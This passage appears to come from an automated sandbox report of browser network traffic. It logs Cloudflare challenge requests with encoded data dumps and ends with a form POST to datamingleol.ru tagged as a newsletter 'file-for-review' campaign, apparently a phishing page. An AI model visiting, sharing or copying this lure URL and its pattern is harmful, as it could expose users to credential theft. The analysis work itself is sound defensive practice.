                                      2024-09-13 13:16:03 UTC1369INData Raw: 62 2b 78 74 34 2b 78 7a 4c 79 72 30 4b 6e 62 34 4d 48 55 77 65 47 2f 74 74 69 34 32 71 6e 68 32 72 37 48 35 2b 58 6e 73 61 79 30 34 73 43 79 75 4d 76 77 31 72 76 6f 38 37 66 77 37 4e 37 79 42 65 37 37 2b 73 6a 69 44 63 50 66 2f 41 34 43 34 52 45 53 42 4f 59 58 39 2b 33 6a 43 2b 4d 53 35 77 37 6f 39 75 33 71 49 76 6e 32 4a 52 37 39 2b 68 72 37 49 76 63 64 4c 67 59 68 38 4f 6f 44 4a 51 4d 5a 4f 6a 63 79 50 66 54 37 49 44 54 39 4e 50 34 51 49 42 4d 2b 2f 6a 6b 36 4f 55 45 6b 41 43 59 2f 4a 53 55 2f 4a 67 78 46 51 69 70 59 57 30 52 59 54 7a 63 64 4c 43 31 4c 47 6b 39 68 51 30 4d 68 56 7a 34 6a 57 57 73 67 51 32 49 70 54 33 4d 38 61 47 6c 66 55 47 52 57 4e 55 31 38 53 56 42 57 59 56 73 2b 63 44 35 50 65 30 52 57 64 32 70 6a 69 45 6d 47 65 45 39 76 61 34 6c 30
                                      Data Ascii: b+xt4+xzLyr0Knb4MHUweG/tti42qnh2r7H5+Xnsay04sCyuMvw1rvo87fw7N7yBe77+sjiDcPf/A4C4RESBOYX9+3jC+MS5w7o9u3qIvn2JR79+hr7IvcdLgYh8OoDJQMZOjcyPfT7IDT9NP4QIBM+/jk6OUEkACY/JSU/JgxFQipYW0RYTzcdLC1LGk9hQ0MhVz4jWWsgQ2IpT3M8aGlfUGRWNU18SVBWYVs+cD5Pe0RWd2pjiEmGeE9va4l0
                                      2024-09-13 13:16:03 UTC1369INData Raw: 69 38 30 75 43 53 73 62 2b 36 35 4b 54 56 70 65 61 62 36 37 7a 4c 72 4c 2f 47 33 61 2f 63 34 36 76 6b 79 2b 54 53 74 62 72 4e 78 75 6a 48 37 75 76 71 32 65 33 7a 34 64 44 66 39 74 72 6a 42 73 58 71 78 50 66 6f 79 51 2f 4e 35 78 48 6d 39 75 55 5a 45 39 48 6f 46 4e 6e 77 34 4f 30 57 34 4f 48 75 49 4f 38 6e 46 66 62 7a 4a 79 76 37 47 79 6b 46 4c 54 51 4a 45 53 30 35 45 41 55 70 4f 78 4d 76 4c 54 38 53 4d 7a 46 44 47 45 59 53 47 78 49 54 4f 6b 73 71 54 69 49 6c 48 30 63 66 4c 77 31 41 4c 6b 63 7a 47 44 6c 5a 4e 44 6b 7a 54 31 31 68 50 30 52 61 4d 54 63 6c 5a 55 4e 56 53 7a 30 35 5a 69 70 61 53 32 6b 73 61 7a 4e 76 55 7a 56 45 57 33 6f 35 58 6c 68 4e 53 31 75 45 56 56 52 54 50 56 4a 71 51 32 46 47 58 6f 6c 66 62 70 43 4e 66 46 36 52 6a 46 4a 70 6d 6d 64 6f 6d
                                      Data Ascii: i80uCSsb+65KTVpeab67zLrL/G3a/c46vky+TStbrNxujH7uvq2e3z4dDf9trjBsXqxPfoyQ/N5xHm9uUZE9HoFNnw4O0W4OHuIO8nFfbzJyv7GykFLTQJES05EAUpOxMvLT8SMzFDGEYSGxITOksqTiIlH0cfLw1ALkczGDlZNDkzT11hP0RaMTclZUNVSz05ZipaS2ksazNvUzVEW3o5XlhNS1uEVVRTPVJqQ2FGXolfbpCNfF6RjFJpmmdom
                                      2024-09-13 13:16:03 UTC1369INData Raw: 30 75 71 36 63 73 71 4f 68 35 71 58 4a 36 4c 37 4b 79 4b 6e 73 37 4d 75 30 30 4d 71 76 7a 39 4b 79 31 73 37 57 39 64 7a 4e 38 75 33 59 31 65 4c 61 77 4c 76 31 2b 41 66 56 2f 74 77 46 78 77 45 42 79 39 30 55 34 2b 66 5a 34 75 38 51 7a 77 77 4f 37 65 44 59 2f 74 76 74 33 42 62 31 35 2b 49 5a 36 79 41 62 42 79 77 79 4b 69 41 4d 46 41 63 43 41 53 67 4c 42 67 55 73 45 44 77 50 4e 51 34 66 47 78 68 43 4a 78 77 64 51 43 45 2f 4e 77 45 51 54 51 73 6c 44 79 5a 48 46 56 6b 6a 4f 6c 46 46 4a 6b 67 57 56 6c 5a 62 55 55 55 67 50 31 77 66 49 55 68 46 4e 46 55 70 4c 45 68 63 55 53 31 7a 64 45 42 75 54 32 64 7a 52 30 70 4d 65 31 39 37 66 56 74 69 55 54 31 55 65 57 4b 4a 67 6d 57 4c 53 34 52 37 58 59 2b 42 54 57 39 6a 67 57 64 70 56 34 4f 53 61 70 6d 57 57 46 70 76 6c 49
                                      Data Ascii: 0uq6csqOh5qXJ6L7KyKns7Mu00Mqvz9Ky1s7W9dzN8u3Y1eLawLv1+AfV/twFxwEBy90U4+fZ4u8QzwwO7eDY/tvt3Bb15+IZ6yAbBywyKiAMFAcCASgLBgUsEDwPNQ4fGxhCJxwdQCE/NwEQTQslDyZHFVkjOlFFJkgWVlZbUUUgP1wfIUhFNFUpLEhcUS1zdEBuT2dzR0pMe197fVtiUT1UeWKJgmWLS4R7XY+BTW9jgWdpV4OSapmWWFpvlI
                                      2024-09-13 13:16:03 UTC1369INData Raw: 34 74 69 2f 35 4b 6a 66 34 71 76 64 72 65 50 69 38 62 48 6a 2b 61 7a 47 30 76 54 54 36 50 55 43 2f 50 6a 74 42 74 7a 30 35 63 51 48 39 4f 48 4a 35 50 6a 69 45 75 66 75 42 74 41 54 35 67 66 56 7a 41 55 51 32 66 4d 64 43 52 51 61 38 66 77 5a 34 68 41 47 34 66 37 6b 42 52 37 71 41 69 41 63 4b 79 45 49 38 44 4d 68 44 76 51 32 4e 52 6f 31 2b 44 41 7a 2b 79 37 39 4e 44 4e 43 41 6a 52 4b 2f 42 63 6a 52 53 51 35 52 6c 4a 4e 53 54 35 57 55 6b 68 49 54 56 4e 49 55 56 51 2f 47 6a 78 5a 52 43 49 34 57 55 39 51 50 6c 77 39 57 44 39 66 50 79 70 45 5a 6c 30 30 64 58 5a 75 61 47 78 73 63 30 74 59 61 47 6f 38 50 44 31 2f 56 33 56 43 63 31 4e 39 52 58 64 35 66 6b 64 4f 52 6f 46 4c 55 34 31 39 55 6b 6d 46 69 31 5a 4e 69 59 32 66 55 57 75 53 58 6d 4f 64 6b 32 47 54 63 35 35
                                      Data Ascii: 4ti/5Kjf4qvdrePi8bHj+azG0vTT6PUC/PjtBtz05cQH9OHJ5PjiEufuBtAT5gfVzAUQ2fMdCRQa8fwZ4hAG4f7kBR7qAiAcKyEI8DMhDvQ2NRo1+DAz+y79NDNCAjRK/BcjRSQ5RlJNST5WUkhITVNIUVQ/GjxZRCI4WU9QPlw9WD9fPypEZl00dXZuaGxsc0tYaGo8PD1/V3VCc1N9RXd5fkdORoFLU419UkmFi1ZNiY2fUWuSXmOdk2GTc55
                                      2024-09-13 13:16:03 UTC1369INData Raw: 71 33 75 30 75 61 77 7a 4f 54 6f 73 71 7a 57 30 37 6a 55 7a 76 47 39 74 4e 72 79 77 41 50 30 2b 73 49 46 77 66 72 49 35 4e 37 34 7a 4f 6a 69 43 64 41 43 45 51 49 48 46 64 73 62 31 78 51 52 45 64 33 34 2f 67 33 67 32 50 49 58 35 51 45 44 47 79 2f 67 2b 69 48 74 35 43 45 6c 38 41 30 6c 4b 50 55 52 46 78 54 34 4f 78 63 78 2f 42 67 39 4e 67 4c 34 46 7a 34 46 4e 51 49 38 43 69 55 72 50 77 34 54 55 55 59 53 4c 54 64 49 57 77 30 76 53 78 70 61 57 55 6f 62 58 79 39 56 49 57 4a 68 51 43 56 58 53 31 34 70 4c 32 31 67 4c 56 35 74 5a 44 49 32 4c 6d 30 31 5a 6e 6c 76 4f 56 56 74 64 44 31 5a 62 56 78 42 67 33 46 2b 52 59 64 35 67 55 65 4c 58 34 42 4f 69 46 4a 73 67 56 64 55 6d 5a 43 44 61 6e 65 53 6d 5a 32 55 58 6d 4b 64 66 4a 47 68 61 47 46 6a 66 4a 39 6f 6d 4b 70 71
                                      Data Ascii: q3u0uawzOTosqzW07jUzvG9tNrywAP0+sIFwfrI5N74zOjiCdACEQIHFdsb1xQREd34/g3g2PIX5QEDGy/g+iHt5CEl8A0lKPURFxT4Oxcx/Bg9NgL4Fz4FNQI8CiUrPw4TUUYSLTdIWw0vSxpaWUobXy9VIWJhQCVXS14pL21gLV5tZDI2Lm01ZnlvOVVtdD1ZbVxBg3F+RYd5gUeLX4BOiFJsgVdUmZCDaneSmZ2UXmKdfJGhaGFjfJ9omKpq


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.449774104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:05 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:05 UTC379INHTTP/1.1 404 Not Found
                                      Date: Fri, 13 Sep 2024 13:16:05 GMT
                                      Content-Type: application/json
                                      Content-Length: 7
                                      Connection: close
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      cf-chl-out: KPqQ/Q12CvwSCqGxaKao5dwTT+zTGZ1XGko=$eBAbNMqab4kzYaYF
                                      Server: cloudflare
                                      CF-RAY: 8c2868e4abef0fa4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:05 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                      Data Ascii: invalid


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.449775104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:16 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      Content-Length: 34142
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      Content-type: application/x-www-form-urlencoded
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      CF-Challenge: 245501c248c6a2e
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Origin: https://challenges.cloudflare.com
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:16 UTC16384OUTData Raw: 76 5f 38 63 32 38 36 38 61 38 64 61 34 64 37 38 65 37 3d 35 31 6b 67 4f 6f 42 39 4a 79 6b 46 6b 5a 37 56 6f 50 5a 47 6b 42 47 42 45 50 74 67 42 4d 50 6c 42 71 50 5a 49 49 4d 5a 77 39 6c 42 59 50 25 32 62 67 56 77 50 33 50 49 4d 38 61 42 24 56 6c 50 5a 55 50 6f 6c 38 56 48 67 6f 7a 44 50 52 4d 6f 54 62 76 67 6b 42 66 50 47 4d 50 66 50 70 52 30 4e 7a 77 50 50 4e 36 65 50 56 43 67 42 62 50 5a 4d 42 54 53 67 5a 6c 50 30 67 50 44 38 38 49 68 7a 50 50 45 79 76 6b 4d 50 62 47 47 56 49 6d 50 73 43 50 50 35 4e 6b 50 2b 67 56 54 49 67 50 62 37 43 4d 55 6b 7a 79 68 50 68 4a 37 50 6f 7a 33 77 76 38 32 42 32 6b 37 78 7a 48 47 37 4e 52 68 50 53 58 42 67 52 58 51 24 50 6f 5a 78 7a 6b 73 68 50 4d 77 62 32 6b 48 41 38 62 71 67 6d 6f 58 71 52 62 49 45 6d 57 35 79 78 61 61
                                      Data Ascii: v_8c2868a8da4d78e7=51kgOoB9JykFkZ7VoPZGkBGBEPtgBMPlBqPZIIMZw9lBYP%2bgVwP3PIM8aB$VlPZUPol8VHgozDPRMoTbvgkBfPGMPfPpR0NzwPPN6ePVCgBbPZMBTSgZlP0gPD88IhzPPEyvkMPbGGVImPsCPP5NkP+gVTIgPb7CMUkzyhPhJ7Poz3wv82B2k7xzHG7NRhPSXBgRXQ$PoZxzkshPMwb2kHA8bqgmoXqRbIEmW5yxaa
                                      2024-09-13 13:16:16 UTC16384OUTData Raw: 36 6b 2d 51 32 33 32 6b 56 53 74 76 65 69 6d 59 67 53 43 78 67 48 6d 56 4a 42 34 67 6f 4d 56 4a 42 78 4d 53 38 76 6b 50 47 50 6f 4d 46 62 50 58 50 32 58 67 6b 42 62 50 6b 31 6f 31 42 7a 50 6d 6d 5a 38 42 69 6d 38 50 6f 6c 42 5a 31 33 6d 48 61 50 75 4d 38 50 38 44 50 2b 50 41 6d 6f 67 50 4d 50 49 47 38 37 42 69 50 24 4d 6f 67 50 45 50 58 6e 52 45 71 58 78 68 4b 36 50 50 39 50 62 77 56 78 42 56 50 48 58 61 4c 50 36 67 6f 73 67 74 42 35 31 5a 67 50 6b 50 31 50 56 50 50 2b 74 72 67 6b 54 50 4d 42 76 6d 33 6b 50 6b 42 55 4d 6b 30 46 62 42 55 4d 52 4a 50 37 78 32 6d 41 56 33 37 42 65 50 5a 50 42 61 42 6b 67 62 54 6f 44 50 46 41 32 67 50 6d 42 31 76 49 6b 38 77 42 56 50 56 50 50 6b 42 6f 35 50 67 6f 67 6d 4d 50 5a 68 4f 4d 50 4c 50 35 39 5a 38 6f 47 50 5a 4d 56
                                      Data Ascii: 6k-Q232kVStveimYgSCxgHmVJB4goMVJBxMS8vkPGPoMFbPXP2XgkBbPk1o1BzPmmZ8Bim8PolBZ13mHaPuM8P8DP+PAmogPMPIG87BiP$MogPEPXnREqXxhK6PP9PbwVxBVPHXaLP6gosgtB51ZgPkP1PVPP+trgkTPMBvm3kPkBUMk0FbBUMRJP7x2mAV37BePZPBaBkgbToDPFA2gPmB1vIk8wBVPVPPkBo5PgogmMPZhOMPLP59Z8oGPZMV
                                      2024-09-13 13:16:16 UTC1374OUTData Raw: 67 42 64 69 4b 36 61 38 31 38 50 61 76 69 31 50 6f 44 4f 58 6e 2b 4c 57 69 34 71 53 50 69 55 42 66 67 6f 4b 74 47 61 4c 59 68 47 42 57 6b 49 46 59 47 50 37 45 6b 64 66 54 44 4f 6b 49 67 79 6d 42 47 54 47 62 6f 50 56 44 50 38 59 75 35 74 79 41 39 59 51 64 74 69 41 68 59 44 2b 34 45 41 24 6c 46 31 42 7a 50 5a 46 6b 61 42 55 4d 76 77 50 30 58 69 50 70 6d 41 58 53 4b 65 55 24 4a 51 2d 79 68 45 52 46 4f 34 6c 4a 49 54 48 39 70 77 50 6e 75 4a 4d 4c 47 36 6c 42 5a 6f 42 72 36 4c 62 56 30 5a 33 50 42 37 58 69 5a 57 33 34 4c 6f 6f 64 73 36 4c 68 38 2d 5a 37 50 69 37 2b 45 5a 65 36 55 6b 50 46 5a 36 67 78 39 69 6c 42 33 36 74 39 39 45 5a 30 67 58 39 7a 2d 5a 6e 36 6e 4d 50 76 5a 62 36 4e 39 24 72 50 70 36 64 39 78 68 74 35 36 30 39 7a 70 78 62 6d 79 50 56 4d 4a 67
                                      Data Ascii: gBdiK6a818Pavi1PoDOXn+LWi4qSPiUBfgoKtGaLYhGBWkIFYGP7EkdfTDOkIgymBGTGboPVDP8Yu5tyA9YQdtiAhYD+4EA$lF1BzPZFkaBUMvwP0XiPpmAXSKeU$JQ-yhERFO4lJITH9pwPnuJMLG6lBZoBr6LbV0Z3PB7XiZW34Loods6Lh8-Z7Pi7+EZe6UkPFZ6gx9ilB36t99EZ0gX9z-Zn6nMPvZb6N9$rPp6d9xht5609zpxbmyPVMJg
                                      2024-09-13 13:16:16 UTC1237INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:16:16 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 4476
                                      Connection: close
                                      cf-chl-out: paomg9nvHbrYtt9z/w0hThlTKJpsDedl7PWm+dvjLQf4vKozY/JGKr/ZHiIzjDwPzKyst3qZ1owz+TROg6kNPFLaQm7WV7b6U6f/1y/FAR/oIqHS16Ilo/4=$+vAGLDS7pb1U5Y32
                                      cf-chl-out-s: B84nnSI37MsKpv+4wE2qQBgYyQeMkigI1Pir0ECWiL9wsX31Bg7DSP7uGh08ONqg4fWKvmv/fKVDCBiuXgZcEpS+NfNWwzvcfDHwQaqLADMSWSnT/r136DEMgCCl0DAvKQrBTVgfsGfwkmTQtd1S2z6WGkHrQLFYdGWgSLsKaXbHr37/6/Msjh8bdMiErm29C5QdL87kX6BpKxpe13cMvkPlkFPp0x16c9Crchn+OJB485sS4I7ItUb5y5ylHIoYRrKDYhsnuNCnlue/RWPDl6xZyJmS76JLHziA+WamjFDzrtqfbGpIJJIUxQhz/2Pj3bXaub0TTIg5n8SeC6VHyBiEKKUKKGfXcjv5uuzMhcqeUhGecGMYvC2gvsHFjcYxvkVEuesQ6sKUR2ZB+PKbgrObmF9X+RVwx7LIh9FeCVXLPmvloiUz+uh9NR5u3WqVR3zPXrj18vrEOfFrsDOWwAMPQwDI0zXpLFu5W++ipyfi2N18woXPnyOkOulHVlh3mUYcXuvVvS10ZG1qrBgXWQpxSQrc6lml/i6HhB+gCbbYbALkAzx3VU52wFzlhAem16QJXSCHaSd8PufZtQyX7aUt9OJavA/mcy9dwPp9V5QPSOppk0OlgKUPd7Rxvf2MECwZ7SbOILnO/Bjbdouno/wD83WBwcpTkGush7Np4G9DLLqKDdm6td3N3rmUAYOIE0HSYgqEmQH/6mnj9bHdlRfX1eWY87sGhkzT4aJrLYCRvudBRpiac7LJg9xniwzcWAm8s84NW+7gLd9CvXnOGturUpMdjJJV8wyHct2Dbg1qK/IFUN8x02MD4CrjShuVwS0=$viiG9UM46uwxqCpK
                                      Server: cloudflare
                                      CF-RAY: 8c28692d09de1885-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:16 UTC132INData Raw: 68 36 52 32 6d 62 57 35 6d 72 6d 37 72 4c 43 2f 78 5a 43 57 73 37 57 66 74 4c 37 41 78 35 36 76 77 37 75 2b 31 4b 54 45 73 61 61 61 32 71 79 6f 6b 4a 6a 4d 34 4c 43 5a 76 4b 4f 63 73 4c 44 47 6f 4c 53 30 77 4c 6d 6c 37 73 58 43 38 2b 44 30 78 50 54 51 74 4d 76 44 38 74 7a 4c 79 4f 44 32 76 2f 4c 77 42 64 66 30 34 64 62 62 43 67 76 64 32 2f 33 4a 45 65 50 71 37 65 50 6d 33 78 63 4f 36 76 54 6b
                                      Data Ascii: h6R2mbW5mrm7rLC/xZCWs7WftL7Ax56vw7u+1KTEsaaa2qyokJjM4LCZvKOcsLDGoLS0wLml7sXC8+D0xPTQtMvD8tzLyOD2v/LwBdf04dbbCgvd2/3JEePq7ePm3xcO6vTk
                                      2024-09-13 13:16:16 UTC1369INData Raw: 2b 78 6e 35 44 74 6a 34 46 4f 77 45 39 79 59 54 2b 2f 55 62 44 51 49 41 49 42 30 78 42 44 45 4e 38 77 63 32 4e 79 67 4d 37 66 63 63 44 77 6f 4a 48 42 41 4e 4c 55 55 58 2f 53 49 58 47 44 77 70 4c 42 6f 71 50 42 77 4a 51 55 6f 6d 46 53 39 4c 53 54 63 6c 4b 55 38 56 4f 52 78 6a 57 44 4a 50 51 7a 4d 2f 55 54 34 31 50 6a 31 6d 53 32 4e 63 54 44 74 56 4e 44 56 4e 53 47 74 31 66 48 56 58 54 48 68 72 59 46 4e 2b 52 47 31 30 64 58 31 64 61 6d 6c 4a 62 48 6d 45 59 6d 4a 75 6b 48 31 4e 63 31 42 57 57 46 6c 78 62 49 2b 5a 6f 48 4e 37 62 36 4a 33 6a 6e 61 66 5a 59 70 35 70 5a 69 6c 64 34 68 70 62 59 2b 4f 68 70 4b 6e 71 72 61 35 72 4c 53 75 6e 49 6d 32 76 73 47 53 73 4d 48 43 78 59 4b 58 74 6f 6d 2b 69 34 66 4a 30 4b 4f 72 6f 4d 75 6e 30 5a 4c 59 77 36 66 4a 74 4a 71
                                      Data Ascii: +xn5Dtj4FOwE9yYT+/UbDQIAIB0xBDEN8wc2NygM7fccDwoJHBANLUUX/SIXGDwpLBoqPBwJQUomFS9LSTclKU8VORxjWDJPQzM/UT41Pj1mS2NcTDtVNDVNSGt1fHVXTHhrYFN+RG10dX1damlJbHmEYmJukH1Nc1BWWFlxbI+ZoHN7b6J3jnafZYp5pZild4hpbY+OhpKnqra5rLSunIm2vsGSsMHCxYKXtom+i4fJ0KOroMun0ZLYw6fJtJq
                                      2024-09-13 13:16:16 UTC1369INData Raw: 52 77 6d 33 2b 44 6c 43 53 48 35 36 52 67 68 37 75 4c 35 4a 77 4d 41 44 69 45 48 45 76 49 75 44 41 63 6f 4b 42 45 4b 4f 54 63 69 41 79 38 30 50 55 6f 7a 50 30 4a 4e 47 55 49 78 4b 7a 45 4b 45 43 6f 50 52 45 34 72 4d 31 42 45 4c 30 6c 4e 4e 55 30 75 55 69 51 30 50 56 34 33 49 6c 38 6b 4a 57 46 68 4a 6c 42 4b 63 31 30 77 58 54 35 72 63 46 42 6a 61 48 46 58 56 54 64 33 63 57 35 30 55 30 57 48 64 6e 42 66 5a 33 35 63 5a 6f 2b 41 54 57 4b 53 53 6b 35 77 64 5a 69 4f 5a 48 4f 4a 56 33 75 51 56 35 65 4b 66 70 42 66 65 49 57 54 6f 33 53 54 6d 57 5a 38 6a 61 4a 71 68 35 4f 6f 6e 6e 47 32 6f 62 4f 68 6a 71 69 62 72 4c 57 79 65 72 68 35 72 36 4f 57 77 4c 75 6e 67 71 61 2f 68 6f 57 46 30 4d 58 4a 76 38 47 6f 68 35 2f 42 7a 39 6d 69 7a 61 75 57 79 73 32 77 6f 65 47 63
                                      Data Ascii: Rwm3+DlCSH56Rgh7uL5JwMADiEHEvIuDAcoKBEKOTciAy80PUozP0JNGUIxKzEKECoPRE4rM1BEL0lNNU0uUiQ0PV43Il8kJWFhJlBKc10wXT5rcFBjaHFXVTd3cW50U0WHdnBfZ35cZo+ATWKSSk5wdZiOZHOJV3uQV5eKfpBfeIWTo3STmWZ8jaJqh5OonnG2obOhjqibrLWyerh5r6OWwLungqa/hoWF0MXJv8Goh5/Bz9mizauWys2woeGc
                                      2024-09-13 13:16:16 UTC1369INData Raw: 30 42 4b 67 59 65 41 50 6e 6a 49 75 38 64 44 79 4c 7a 4d 52 49 78 39 4f 34 63 39 52 38 51 47 79 7a 38 52 45 4d 38 42 44 49 70 50 6b 64 4a 4a 6c 42 48 45 51 51 4c 45 55 41 4d 53 6b 30 73 4e 68 4d 39 4f 6c 39 52 47 56 55 71 54 69 42 5a 52 31 49 35 61 55 4e 68 50 6a 70 73 59 43 78 45 53 32 56 6f 4b 31 4e 69 59 6a 5a 71 61 58 46 58 52 32 35 68 53 31 31 36 59 30 35 41 63 6b 46 4a 51 6e 39 48 50 33 68 37 59 56 39 2f 69 49 74 30 63 6f 52 6e 55 5a 75 63 6c 32 5a 58 69 33 4b 4d 6f 4a 5a 68 62 6d 53 52 66 58 4b 6e 59 6d 78 2b 5a 71 46 72 73 5a 79 71 69 59 4f 51 72 70 6d 44 67 37 47 61 73 59 6d 70 66 4b 4c 44 72 36 79 62 6f 72 53 48 66 36 69 45 69 4d 69 45 77 38 75 6a 75 72 32 31 70 38 48 42 6b 37 43 78 7a 73 53 79 6c 63 37 49 72 70 6a 59 73 39 33 5a 30 38 62 6f 36
                                      Data Ascii: 0BKgYeAPnjIu8dDyLzMRIx9O4c9R8QGyz8REM8BDIpPkdJJlBHEQQLEUAMSk0sNhM9Ol9RGVUqTiBZR1I5aUNhPjpsYCxES2VoK1NiYjZqaXFXR25hS116Y05AckFJQn9HP3h7YV9/iIt0coRnUZucl2ZXi3KMoJZhbmSRfXKnYmx+ZqFrsZyqiYOQrpmDg7GasYmpfKLDr6yborSHf6iEiMiEw8ujur21p8HBk7CxzsSylc7IrpjYs93Z08bo6
                                      2024-09-13 13:16:16 UTC237INData Raw: 61 36 44 51 49 41 67 6f 46 42 52 66 77 4c 52 6b 4b 39 43 34 4d 38 78 6a 35 41 45 59 63 52 68 6c 4b 45 7a 6b 49 54 78 63 75 52 30 6b 6d 48 54 5a 55 4c 6b 38 4c 52 43 6b 30 4b 52 55 2b 4c 7a 52 42 4e 42 39 63 57 46 77 35 4f 54 35 41 61 6b 4a 76 59 6b 68 76 55 69 39 56 61 6d 51 79 5a 47 52 45 4e 6e 56 4c 4f 6b 6c 4c 51 49 4a 5a 56 48 6b 34 64 48 64 46 66 6e 70 65 52 32 65 42 65 57 2b 4f 69 34 2b 43 5a 4a 42 59 62 30 79 61 6c 46 4e 71 6e 46 39 54 6d 4b 47 64 66 48 4b 6c 65 35 57 69 6f 6d 4a 2f 69 47 6c 37 72 71 61 41 71 36 79 54 71 4b 43 4e 70 59 75 31 63 33 79 63 6d 61 71 68 6e 4a 79 79 6c 61 43 67 6c 4a 6d 6b 70 4a 2b 58 30 49 6a 52 75 37 43 74 31 63 58 49 78 39 53 33 78 4c 57 56 33 37 61 6f 70 61 59 3d
                                      Data Ascii: a6DQIAgoFBRfwLRkK9C4M8xj5AEYcRhlKEzkITxcuR0kmHTZULk8LRCk0KRU+LzRBNB9cWFw5OT5AakJvYkhvUi9VamQyZGRENnVLOklLQIJZVHk4dHdFfnpeR2eBeW+Oi4+CZJBYb0yalFNqnF9TmKGdfHKle5WiomJ/iGl7rqaAq6yTqKCNpYu1c3ycmaqhnJyylaCglJmkpJ+X0IjRu7Ct1cXIx9S3xLWV37aopaY=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.449778104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:17 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:17 UTC379INHTTP/1.1 404 Not Found
                                      Date: Fri, 13 Sep 2024 13:16:17 GMT
                                      Content-Type: application/json
                                      Content-Length: 7
                                      Connection: close
                                      cf-chl-out: AKlMEBNLf7nR+3ZRqTFhxekjY8anYf3OeNs=$LSl7Xn/l7qwBL1PG
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Server: cloudflare
                                      CF-RAY: 8c2869322e40c339-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:17 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                      Data Ascii: invalid


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.449780188.114.96.34434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:17 UTC1072OUTPOST /tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review HTTP/1.1
                                      Host: datamingleol.ru
                                      Connection: keep-alive
                                      Content-Length: 859
                                      Cache-Control: max-age=0
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Upgrade-Insecure-Requests: 1
                                      Origin: https://datamingleol.ru
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-User: ?1
                                      Sec-Fetch-Dest: document
                                      Referer: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Cookie: PHPSESSID=k0qm5f5og2nqg3439jrhip006m
